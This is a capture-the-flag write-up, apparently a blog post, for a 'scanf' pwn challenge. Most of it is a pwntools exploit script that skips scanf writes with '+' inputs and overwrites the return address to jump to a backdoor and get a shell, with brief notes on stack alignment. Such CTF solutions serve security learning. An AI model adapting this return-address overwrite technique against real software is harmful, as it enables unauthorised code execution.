Week3_不思議なscanf


Security mitigations


After the return address is overwritten, the call stack changes as well.


The attachment I downloaded may have had a problem: when I tried the official writeup, this is what happened. The call stack is wrong, yet it still reaches the backdoor.


I asked around, and the challenge author Chovy provided the original function graph.


exp

```python
from pwn import *
from ctypes import *

context(arch="amd64", log_level="debug", os="linux")
#p = remote('192.168.65.1',6666)
p = process('./pwn')
#ELFpath = './pwn'
#p=process(['./ld-linux-x86-64.so.2', ELFpath], env={"LD_PRELOAD":'./libc.so.6'})
#elf = ELF('./pwn')
#libc = ELF('./libc.so.6')

# short aliases for the pwntools tube API
def s(s): return p.send(s)
def sa(s, n): return p.sendafter(s, n)
def sl(s): return p.sendline(s)
def sla(s, n): return p.sendlineafter(s, n)
def r(n): return p.recv(n)
def ru(s): return p.recvuntil(s)
def ti(): return p.interactive()
def pp(a): print(a)
def pr(): print(p.recv())
def ph(a): print(hex(a))

# leak helpers: a 32-bit libc pointer ends in 0xf7, a 64-bit one in 0x7f
# (the original had u32/u64 and the pad widths swapped)
def get32(): return u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
def get64(): return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def getlibc(a): return libc_base + libc.sym[a]

def bug():
    pause()
    gdb.attach(p)

backdoor = 0x401281
for _ in range(10):
    sla('ます!', b'+')
ru('ます!')
sl(str(0x401261))  # shows that skipping the mov rbp,rsp stack-alignment step is enough
#0x401240|41|61|62
ru('ます!')
sl(str(0))
pause()
gdb.attach(p)
#sl(b'0')
for _ in range(4):
    sla('ます!', b'+')
ti()
```

http://sh1j1.github.io/2024/12/01/Week3-不思議なscanf/
Author
sh1j1
Published on
December 1, 2024
License